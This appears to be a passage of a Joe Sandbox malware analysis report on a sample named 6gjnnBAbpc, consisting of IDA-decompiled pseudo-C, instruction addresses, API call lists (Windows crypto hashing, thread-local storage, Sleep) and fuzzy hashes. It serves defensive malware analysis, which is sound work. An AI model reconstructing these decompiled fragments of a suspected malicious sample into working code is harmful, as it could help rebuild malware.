                                                                                                                                                                                                                                                                                                        						 *((char*)(_a8 + _v32 * 0x1e)) = _v92;
                                                                                                                                                                                                                                                                                                        						_v12 = _v12 + 1;
                                                                                                                                                                                                                                                                                                        						_v8 = _v8 + 1;
                                                                                                                                                                                                                                                                                                        						_t56 = _v32 + 1;
                                                                                                                                                                                                                                                                                                        						_v32 = _v32 + 1;
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                                                                                                        				return _v8;
                                                                                                                                                                                                                                                                                                        			}



















                                                                                                                                                                                                                                                                                                        0x04009409
                                                                                                                                                                                                                                                                                                        0x04009414
                                                                                                                                                                                                                                                                                                        0x0400943d
                                                                                                                                                                                                                                                                                                        0x04009442
                                                                                                                                                                                                                                                                                                        0x04009451
                                                                                                                                                                                                                                                                                                        0x04009454
                                                                                                                                                                                                                                                                                                        0x04009466
                                                                                                                                                                                                                                                                                                        0x04009480
                                                                                                                                                                                                                                                                                                        0x0400949a
                                                                                                                                                                                                                                                                                                        0x0400949f
                                                                                                                                                                                                                                                                                                        0x040094a2
                                                                                                                                                                                                                                                                                                        0x040094a9
                                                                                                                                                                                                                                                                                                        0x040094bf
                                                                                                                                                                                                                                                                                                        0x040094ab
                                                                                                                                                                                                                                                                                                        0x040094b1
                                                                                                                                                                                                                                                                                                        0x040094b1
                                                                                                                                                                                                                                                                                                        0x040094d1
                                                                                                                                                                                                                                                                                                        0x040094ed
                                                                                                                                                                                                                                                                                                        0x040094fd
                                                                                                                                                                                                                                                                                                        0x04009502
                                                                                                                                                                                                                                                                                                        0x04009513
                                                                                                                                                                                                                                                                                                        0x04009519
                                                                                                                                                                                                                                                                                                        0x04009521
                                                                                                                                                                                                                                                                                                        0x04009533
                                                                                                                                                                                                                                                                                                        0x0400953c
                                                                                                                                                                                                                                                                                                        0x04009545
                                                                                                                                                                                                                                                                                                        0x04009460
                                                                                                                                                                                                                                                                                                        0x04009463
                                                                                                                                                                                                                                                                                                        0x04009463
                                                                                                                                                                                                                                                                                                        0x04009466
                                                                                                                                                                                                                                                                                                        0x04009553

                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                          • Part of subcall function 04008BB0: CryptAcquireContextA.ADVAPI32(00000000,0400C6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000000), ref: 04008BFF
                                                                                                                                                                                                                                                                                                          • Part of subcall function 04008BB0: GetLastError.KERNEL32 ref: 04008C09
                                                                                                                                                                                                                                                                                                          • Part of subcall function 04008BB0: CryptAcquireContextA.ADVAPI32(00000000,0400C6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008), ref: 04008C38
                                                                                                                                                                                                                                                                                                          • Part of subcall function 04008BB0: CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 04008C59
                                                                                                                                                                                                                                                                                                          • Part of subcall function 04008BB0: CryptHashData.ADVAPI32(00000000,00000000,00000000,00000000), ref: 04008C71
                                                                                                                                                                                                                                                                                                          • Part of subcall function 04008BB0: CryptGetHashParam.ADVAPI32(00000000,00000004,00000000,00000004,00000000), ref: 04008C99
                                                                                                                                                                                                                                                                                                          • Part of subcall function 04008BB0: CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,?,00000000), ref: 04008CC1
                                                                                                                                                                                                                                                                                                          • Part of subcall function 04008BB0: CryptDestroyHash.ADVAPI32(00000000), ref: 04008CD5
                                                                                                                                                                                                                                                                                                          • Part of subcall function 04008BB0: CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 04008CE1
                                                                                                                                                                                                                                                                                                        • lstrcpyA.KERNEL32(?,00000000), ref: 04009513
                                                                                                                                                                                                                                                                                                        • CharUpperA.USER32(?), ref: 04009521
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.659687916.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.659598830.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.660025736.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.660136612.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_4000000_6gjnnBAbpc.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Crypt$Hash$Context$AcquireParam$CharCreateDataDestroyErrorLastReleaseUpperlstrcpy
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 2710640451-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 8d992d858b78b8c12e31d27f4ae823d4f8e581c9f8660fd8284da344811b5e85
                                                                                                                                                                                                                                                                                                        • Instruction ID: bc5be7810042b5ebbd7ddf8470aca826c8a0736d185973949ab2100ea4ccd4f3
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8d992d858b78b8c12e31d27f4ae823d4f8e581c9f8660fd8284da344811b5e85
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 564119B1D00208EBEB44DFD4C881BEEBBB5EF58308F10C15AD515BB281E774AA85CB91
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • IsBadHugeReadPtr.KERNEL32(00000000,00000014), ref: 100021F9
                                                                                                                                                                                                                                                                                                        • SetLastError.KERNEL32(0000007E), ref: 1000223B
                                                                                                                                                                                                                                                                                                        • SetLastError.KERNEL32(0000000E), ref: 1000228B
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.670998844.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_10001000_6gjnnBAbpc.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: ErrorLast$HugeRead
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 100728148-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: bd318f91544f178069688045f5b296fb20421188c60a54711fd69487c4a0a276
                                                                                                                                                                                                                                                                                                        • Instruction ID: 133c763f371e93ed1e981491a31024dabb451d2fe405ffdb26697d1a1c2a5393
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: bd318f91544f178069688045f5b296fb20421188c60a54711fd69487c4a0a276
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3301C975A01149EFEB04DF94C985B9EBBB5EF48354F208298E909AB255C734EF40DBA0
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • TlsAlloc.KERNEL32(?,?,?,?,00E72558,004102E5,?,?,FFFFFFFF,0041032C), ref: 0040FCAE
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.630613479.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.630299651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.630481096.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631291929.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631468354.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631586633.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631856136.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631956687.000000000042E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.632480755.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_6gjnnBAbpc.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Alloc
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 2773662609-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 1d68505a4d2c2be1fd6997ff3538c2e8bada1c9bb70ca8cacadf71cbb6f6cc32
                                                                                                                                                                                                                                                                                                        • Instruction ID: 42ba0e2f8ca25937b9577218f0e8f1747412e3c7344b5913d50b7ca6b605e0fe
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1d68505a4d2c2be1fd6997ff3538c2e8bada1c9bb70ca8cacadf71cbb6f6cc32
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3DF0AFB0204305AFD730AFB6E94520A7AE0BB44304F85893EE99567791D778540ADB9E
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.630613479.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.630299651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.630481096.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631291929.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631468354.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631586633.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631856136.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631956687.000000000042E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.632480755.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_6gjnnBAbpc.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Sleep
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 3472027048-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 11c03190e962a3336078bc9f9bd4b39e56c7c2d924a363fb5b6bd62e4403c688
                                                                                                                                                                                                                                                                                                        • Instruction ID: 9a935b580d19b4844a8e347fe3f337539f3ef189ba2f3eb9209136ab9bdebf7b
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 11c03190e962a3336078bc9f9bd4b39e56c7c2d924a363fb5b6bd62e4403c688
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D3313DB0204301DFD720EF65E54435ABBE0BB40708F518C7ED8859B792D7BD9889DB9A
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.670998844.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_10001000_6gjnnBAbpc.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                                        • Opcode ID: d8f230ea85c0c82a46ce4fe9d3adae6cb5bbcd7638e6efd245ab957bab051541
                                                                                                                                                                                                                                                                                                        • Instruction ID: 8f4ecb97985d5e8621b4f5fb532634e6274162181c58748ea6569eeff33a15e4
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d8f230ea85c0c82a46ce4fe9d3adae6cb5bbcd7638e6efd245ab957bab051541
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D6418574A04109AFEB44CF44D494BEAB7B2FB88394F24C15AEC195B359D775EE82CB80
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                        C-Code - Quality: 50%
                                                                                                                                                                                                                                                                                                        			E00415890(void* __ecx, void* __eflags, intOrPtr* _a4) {
                                                                                                                                                                                                                                                                                                        				void* _v16;
                                                                                                                                                                                                                                                                                                        				intOrPtr _v32;
                                                                                                                                                                                                                                                                                                        				intOrPtr _v36;
                                                                                                                                                                                                                                                                                                        				char _v40;
                                                                                                                                                                                                                                                                                                        				signed int _v48;
                                                                                                                                                                                                                                                                                                        				intOrPtr _v56;
                                                                                                                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                                                                                                                        				void* _t32;
                                                                                                                                                                                                                                                                                                        				signed int _t35;
                                                                                                                                                                                                                                                                                                        				signed int _t40;
                                                                                                                                                                                                                                                                                                        				signed int _t47;
                                                                                                                                                                                                                                                                                                        				signed int _t53;
                                                                                                                                                                                                                                                                                                        				void* _t54;
                                                                                                                                                                                                                                                                                                        				signed int _t55;
                                                                                                                                                                                                                                                                                                        				intOrPtr _t62;
                                                                                                                                                                                                                                                                                                        				intOrPtr _t63;
                                                                                                                                                                                                                                                                                                        				intOrPtr* _t64;
                                                                                                                                                                                                                                                                                                        
                                                                                                                                                                                                                                                                                                        				_t54 = __ecx;
                                                                                                                                                                                                                                                                                                        				E00412210(); // executed
                                                                                                                                                                                                                                                                                                        				_t32 = E00415320(_a4, _t54);
                                                                                                                                                                                                                                                                                                        				if(_t32 == 0) {
                                                                                                                                                                                                                                                                                                        					_t63 =  *_a4;
                                                                                                                                                                                                                                                                                                        					_t35 = E00414E80(_t63);
                                                                                                                                                                                                                                                                                                        					__eflags = _t35;
                                                                                                                                                                                                                                                                                                        					_t53 = _t35;
                                                                                                                                                                                                                                                                                                        					if(_t35 == 0) {
                                                                                                                                                                                                                                                                                                        						__eflags =  *(_t63 + 8);
                                                                                                                                                                                                                                                                                                        						if( *(_t63 + 8) != 0) {
                                                                                                                                                                                                                                                                                                        							L12:
                                                                                                                                                                                                                                                                                                        							 *_t64 = _t63 + 8;
                                                                                                                                                                                                                                                                                                        							InterlockedIncrement(??);
                                                                                                                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                                                                                                                        							_t55 =  *(_t63 + 0x10);
                                                                                                                                                                                                                                                                                                        							_t40 =  *(_t63 + 0xc);
                                                                                                                                                                                                                                                                                                        							__eflags = _t55;
                                                                                                                                                                                                                                                                                                        							if(_t55 > 0) {
                                                                                                                                                                                                                                                                                                        								_t40 = _t40 - _t55;
                                                                                                                                                                                                                                                                                                        								__eflags = _t40;
                                                                                                                                                                                                                                                                                                        								 *(_t63 + 0xc) = _t40;
                                                                                                                                                                                                                                                                                                        								 *(_t63 + 0x10) = 0;
                                                                                                                                                                                                                                                                                                        							}
                                                                                                                                                                                                                                                                                                        							__eflags = _t40;
                                                                                                                                                                                                                                                                                                        							if(_t40 <= 0) {
                                                                                                                                                                                                                                                                                                        								goto L12;
                                                                                                                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                                                                                                                        								 *(_t63 + 0x10) =  ~_t40;
                                                                                                                                                                                                                                                                                                        								_t62 = _t63 + 0x18;
                                                                                                                                                                                                                                                                                                        								_v40 = E00414F10;
                                                                                                                                                                                                                                                                                                        								_v36 = _t63;
                                                                                                                                                                                                                                                                                                        								_v32 =  *((intOrPtr*)(E00411E50()));
                                                                                                                                                                                                                                                                                                        								asm("mfence");
                                                                                                                                                                                                                                                                                                        								 *((intOrPtr*)(E00411E50())) =  &_v40;
                                                                                                                                                                                                                                                                                                        								asm("mfence");
                                                                                                                                                                                                                                                                                                        								_v48 = _t63 + 0x1c;
                                                                                                                                                                                                                                                                                                        								while(1) {
                                                                                                                                                                                                                                                                                                        									_v56 = _t62;
                                                                                                                                                                                                                                                                                                        									 *_t64 = _v48;
                                                                                                                                                                                                                                                                                                        									_t47 = E00416A70(__eflags);
                                                                                                                                                                                                                                                                                                        									__eflags = _t47;
                                                                                                                                                                                                                                                                                                        									if(_t47 != 0) {
                                                                                                                                                                                                                                                                                                        										break;
                                                                                                                                                                                                                                                                                                        									}
                                                                                                                                                                                                                                                                                                        									__eflags =  *(_t63 + 0x10);
                                                                                                                                                                                                                                                                                                        									if(__eflags >= 0) {
                                                                                                                                                                                                                                                                                                        										 *((intOrPtr*)(E00411E50())) = _v32;
                                                                                                                                                                                                                                                                                                        										 *(_t63 + 0xc) = 0;
                                                                                                                                                                                                                                                                                                        										goto L12;
                                                                                                                                                                                                                                                                                                        									} else {
                                                                                                                                                                                                                                                                                                        										continue;
                                                                                                                                                                                                                                                                                                        									}
                                                                                                                                                                                                                                                                                                        									goto L13;
                                                                                                                                                                                                                                                                                                        								}
                                                                                                                                                                                                                                                                                                        								_v48 = _t47;
                                                                                                                                                                                                                                                                                                        								 *((intOrPtr*)(E00411E50())) = _v32;
                                                                                                                                                                                                                                                                                                        								 *_t64 = _v36;
                                                                                                                                                                                                                                                                                                        								_v40();
                                                                                                                                                                                                                                                                                                        								_t53 = _v48;
                                                                                                                                                                                                                                                                                                        							}
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        					L13:
                                                                                                                                                                                                                                                                                                        					return E00414F30(_a4, _t53, _t53, _t63);
                                                                                                                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                                                                                                                        					return _t32;
                                                                                                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                                                                                                        			}





















                                                                                                                                                                                                                                                                                                        0x00415890
                                                                                                                                                                                                                                                                                                        0x00415899
                                                                                                                                                                                                                                                                                                        0x004158a1
                                                                                                                                                                                                                                                                                                        0x004158a8
                                                                                                                                                                                                                                                                                                        0x004158b5
                                                                                                                                                                                                                                                                                                        0x004158b9
                                                                                                                                                                                                                                                                                                        0x004158be
                                                                                                                                                                                                                                                                                                        0x004158c0
                                                                                                                                                                                                                                                                                                        0x004158c2
                                                                                                                                                                                                                                                                                                        0x004158cb
                                                                                                                                                                                                                                                                                                        0x004158cd
                                                                                                                                                                                                                                                                                                        0x00415971
                                                                                                                                                                                                                                                                                                        0x00415974
                                                                                                                                                                                                                                                                                                        0x00415977
                                                                                                                                                                                                                                                                                                        0x004158d3
                                                                                                                                                                                                                                                                                                        0x004158d3
                                                                                                                                                                                                                                                                                                        0x004158d6
                                                                                                                                                                                                                                                                                                        0x004158d9
                                                                                                                                                                                                                                                                                                        0x004158db
                                                                                                                                                                                                                                                                                                        0x004158dd
                                                                                                                                                                                                                                                                                                        0x004158dd
                                                                                                                                                                                                                                                                                                        0x004158df
                                                                                                                                                                                                                                                                                                        0x004158e2
                                                                                                                                                                                                                                                                                                        0x004158e2
                                                                                                                                                                                                                                                                                                        0x004158e9
                                                                                                                                                                                                                                                                                                        0x004158eb
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x004158f1
                                                                                                                                                                                                                                                                                                        0x004158f3
                                                                                                                                                                                                                                                                                                        0x004158f6
                                                                                                                                                                                                                                                                                                        0x004158f9
                                                                                                                                                                                                                                                                                                        0x00415900
                                                                                                                                                                                                                                                                                                        0x0041590a
                                                                                                                                                                                                                                                                                                        0x0041590d
                                                                                                                                                                                                                                                                                                        0x00415918
                                                                                                                                                                                                                                                                                                        0x0041591d
                                                                                                                                                                                                                                                                                                        0x00415920
                                                                                                                                                                                                                                                                                                        0x0041592c
                                                                                                                                                                                                                                                                                                        0x0041592f
                                                                                                                                                                                                                                                                                                        0x00415933
                                                                                                                                                                                                                                                                                                        0x00415936
                                                                                                                                                                                                                                                                                                        0x0041593b
                                                                                                                                                                                                                                                                                                        0x0041593d
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00415928
                                                                                                                                                                                                                                                                                                        0x0041592a
                                                                                                                                                                                                                                                                                                        0x00415968
                                                                                                                                                                                                                                                                                                        0x0041596a
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x0041592a
                                                                                                                                                                                                                                                                                                        0x0041593f
                                                                                                                                                                                                                                                                                                        0x0041594a
                                                                                                                                                                                                                                                                                                        0x0041594f
                                                                                                                                                                                                                                                                                                        0x00415952
                                                                                                                                                                                                                                                                                                        0x00415958
                                                                                                                                                                                                                                                                                                        0x00415958
                                                                                                                                                                                                                                                                                                        0x004158eb
                                                                                                                                                                                                                                                                                                        0x004158cd
                                                                                                                                                                                                                                                                                                        0x00415980
                                                                                                                                                                                                                                                                                                        0x00415991
                                                                                                                                                                                                                                                                                                        0x004158aa
                                                                                                                                                                                                                                                                                                        0x004158b1
                                                                                                                                                                                                                                                                                                        0x004158b1

                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.630613479.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.630299651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.630481096.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631291929.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631468354.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631586633.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631856136.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631956687.000000000042E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.632480755.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_6gjnnBAbpc.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                                        • Opcode ID: a2bd1cefeceeada203d1a88774c59cc1db89744ccd2cbebff13c81639432a2fb
                                                                                                                                                                                                                                                                                                        • Instruction ID: 7064b4f85ec8c943a007a1c63ca079293348c6aff3994ae5daf0d86751bc83bd
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a2bd1cefeceeada203d1a88774c59cc1db89744ccd2cbebff13c81639432a2fb
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D6310AB4A00705CFDB10EFAAD4405DEBBF4EF88354B00892AE956D7711E738A945CFA9
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                        C-Code - Quality: 58%
                                                                                                                                                                                                                                                                                                        			E004111D0(void* __ecx, intOrPtr* _a4, intOrPtr _a8) {
                                                                                                                                                                                                                                                                                                        				intOrPtr _v32;
                                                                                                                                                                                                                                                                                                        				char* _v36;
                                                                                                                                                                                                                                                                                                        				char _v40;
                                                                                                                                                                                                                                                                                                        				intOrPtr _v48;
                                                                                                                                                                                                                                                                                                        				intOrPtr _v52;
                                                                                                                                                                                                                                                                                                        				char* _v56;
                                                                                                                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                                                                                                                        				void* __ebp;
                                                                                                                                                                                                                                                                                                        				void* _t16;
                                                                                                                                                                                                                                                                                                        				char* _t18;
                                                                                                                                                                                                                                                                                                        				intOrPtr* _t36;
                                                                                                                                                                                                                                                                                                        				intOrPtr _t41;
                                                                                                                                                                                                                                                                                                        				char* _t42;
                                                                                                                                                                                                                                                                                                        				intOrPtr _t44;
                                                                                                                                                                                                                                                                                                        				intOrPtr _t46;
                                                                                                                                                                                                                                                                                                        				void* _t47;
                                                                                                                                                                                                                                                                                                        				intOrPtr* _t48;
                                                                                                                                                                                                                                                                                                        
                                                                                                                                                                                                                                                                                                        				_t37 = __ecx;
                                                                                                                                                                                                                                                                                                        				_t16 = 0x16;
                                                                                                                                                                                                                                                                                                        				_t48 = _t47 - 0x2c;
                                                                                                                                                                                                                                                                                                        				_t36 = _a4;
                                                                                                                                                                                                                                                                                                        				_t41 =  *_t36;
                                                                                                                                                                                                                                                                                                        				if(_a8 != 0) {
                                                                                                                                                                                                                                                                                                        					_t16 = 0;
                                                                                                                                                                                                                                                                                                        					if(_t41 != 1) {
                                                                                                                                                                                                                                                                                                        						_t18 = E0040F1C0(_t36, __ecx);
                                                                                                                                                                                                                                                                                                        						_t3 = _t18 + 4; // 0x4
                                                                                                                                                                                                                                                                                                        						_t46 = _t3;
                                                                                                                                                                                                                                                                                                        						_t42 = _t18;
                                                                                                                                                                                                                                                                                                        						 *_t48 = _t46;
                                                                                                                                                                                                                                                                                                        						E00413FD0();
                                                                                                                                                                                                                                                                                                        						_t44 =  *_t36;
                                                                                                                                                                                                                                                                                                        						if(_t44 == 0) {
                                                                                                                                                                                                                                                                                                        							_v40 = 0x40f4b0;
                                                                                                                                                                                                                                                                                                        							_v36 = _t42;
                                                                                                                                                                                                                                                                                                        							_t9 = E004102F0(_t36, _t37, _t41, _t42, _t44) + 0xc; // 0xc
                                                                                                                                                                                                                                                                                                        							_t22 =  ==  ? _t44 : _t9;
                                                                                                                                                                                                                                                                                                        							_t23 =  *((intOrPtr*)( ==  ? _t44 : _t9));
                                                                                                                                                                                                                                                                                                        							_v32 =  *((intOrPtr*)( ==  ? _t44 : _t9));
                                                                                                                                                                                                                                                                                                        							asm("mfence");
                                                                                                                                                                                                                                                                                                        							_t11 = E004102F0(_t36, _t9, _t41, _t42, _t44) + 0xc; // 0xc
                                                                                                                                                                                                                                                                                                        							_t26 =  ==  ? _t44 : _t11;
                                                                                                                                                                                                                                                                                                        							 *((intOrPtr*)( ==  ? _t44 : _t11)) =  &_v40;
                                                                                                                                                                                                                                                                                                        							asm("mfence");
                                                                                                                                                                                                                                                                                                        							_a8();
                                                                                                                                                                                                                                                                                                        							_t14 = E004102F0(_t36,  &_v40, _t41, _t42, _t44) + 0xc; // 0xc
                                                                                                                                                                                                                                                                                                        							_t37 = _t14;
                                                                                                                                                                                                                                                                                                        							_t45 =  !=  ? _t14 : _t44;
                                                                                                                                                                                                                                                                                                        							 *((intOrPtr*)( !=  ? _t14 : _t44)) = _v32;
                                                                                                                                                                                                                                                                                                        							 *_t36 = 1;
                                                                                                                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                                                                                                                        							if(_t44 != 1) {
                                                                                                                                                                                                                                                                                                        								_v48 = _t44;
                                                                                                                                                                                                                                                                                                        								_v52 = _t36;
                                                                                                                                                                                                                                                                                                        								_v56 = " once %p is %d\n";
                                                                                                                                                                                                                                                                                                        								 *_t48 = __imp___iob + 0x40;
                                                                                                                                                                                                                                                                                                        								fprintf(??, ??);
                                                                                                                                                                                                                                                                                                        							}
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        						 *_t48 = _t46;
                                                                                                                                                                                                                                                                                                        						E00413A00(_t37);
                                                                                                                                                                                                                                                                                                        						E0040F340(_t42);
                                                                                                                                                                                                                                                                                                        						_t16 = 0;
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                                                                                                        				return _t16;
